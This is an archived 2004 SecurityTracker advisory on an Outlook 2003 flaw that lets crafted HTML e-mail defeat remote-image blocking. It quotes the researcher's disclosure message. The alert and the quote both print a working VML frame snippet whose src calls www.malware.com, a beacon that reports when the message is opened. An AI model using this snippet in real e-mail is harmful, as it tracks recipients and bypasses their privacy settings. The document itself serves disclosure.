SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Client)  >   Microsoft Outlook Vendors:   Microsoft
Microsoft Outlook 2003 Lets Remote Users Send E-mail to Cause the Recipient's Client to Contact a Remote Server
SecurityTracker Alert ID:  1010125
SecurityTracker URL:  http://securitytracker.com/id/1010125
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 11 2004
Impact:   Disclosure of user information, Host/resource access via network
Exploit Included:  Yes  
Version(s): Outlook 2003
Description:   A vulnerability was reported in Microsoft Outlook 2003. A remote user can send specially crafted e-mail that, when viewed by the target user, will report back to a remote server that the message has been viewed (even if security measures are in place).

http-equiv reported that a flaw in Microsoft's VML schema implementation for Outlook 2003 lets a remote user effectively bypass the Automatic Picture Download Settings that are intended to prevent remote users from determining if the recipient has viewed a message. A remote user can send a specially crafted HTML e-mail that specifies a VML frame style with a source pointing to the remote user's web site and has the HTML invoke the VML style. The HTML does not need to include a frame. Then, when the target user (recipient) views the message, the target user's Outlook client will contact the specified remote web site, thereby disclosing to the remote user that the message has been viewed.

Some demonstration exploit content is provided:

<v:vml frame style="LEFT: 50px; WIDTH: 300px; POSITION:
relative; TOP: 30px; HEIGHT: 200px"
src = "http://www.malware.com/duh.txt#malware"></v:vmlframe>

<HTML>
<HEAD>
<STYLE>
v\:* { behavior: url(#default#VML); }
</STYLE>
<XML:NAMESPACE NS="urn:schemas-microsoft-com:vml" PREFIX="v"/>
</HEAD>

Impact:   A remote user can send e-mail that, when viewed by the target user, will cause the target user's Outlook client to contact the remote user's server (even if the target user has configured Outlook to block remote site downloads).
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/ (Links to External Site)
Cause:   Access control error, State error
Underlying OS:  Windows (2000), Windows (2003), Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  PING: Outlook 2003 Spam




Tuesday, May 11, 2004

Outlook 2003 the premier mail client from the company 
called 'Microsoft' certainly appears to have a lot of security 
features built into it.  Cursory examination shows excellent 
thought into 'spam' containment, 'security' consideration and 
many other little 'things'. So much so the default rendering of
html is in so-called 'restricted zone' which disallows nearly
everything [frames, iframes, objects, scripting etc.]. In 
addition 'special' spam measures are taken to disallow graphic 
downloads from a remote server in html email which can be used 
to verify recipients:

[screen shot: http://www.malware.com/duhlook.png 40KB]        

The Key Word is: nearly 

Utilising Outlook's own bizarre scheMAH ! which comprises 
a 'proper' frame along with an src pointing to our remote 
server, we are able to ping the server and confirm our recipient 
has viewed our email. We don't require graphics or frames or 
iframes to do that:

<v:vml frame style="LEFT: 50px; WIDTH: 300px; POSITION: 
relative; TOP: 30px; HEIGHT: 200px" 
src = "http://www.malware.com/duh.txt#malware"></v:vmlframe>

<HTML>
<HEAD>
<STYLE>
v\:* { behavior: url(#default#VML); }
</STYLE>
<XML:NAMESPACE NS="urn:schemas-microsoft-com:vml" PREFIX="v"/>
</HEAD>


Notes:

1. We now commence our examination of the Microsoft Office 2003 
suite, we're a bit late, but it has taken all this time to save 
up to buy the thing
2. Quick 72 hour prodding reveals that this 'perceived' premier 
device known as Outlook 2003 is in fact riddled with holes
3. Do not receive or open any emails period.  Use string and tin 
cans if you must communicate



End Call


-- 
http://www.malware.com




 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC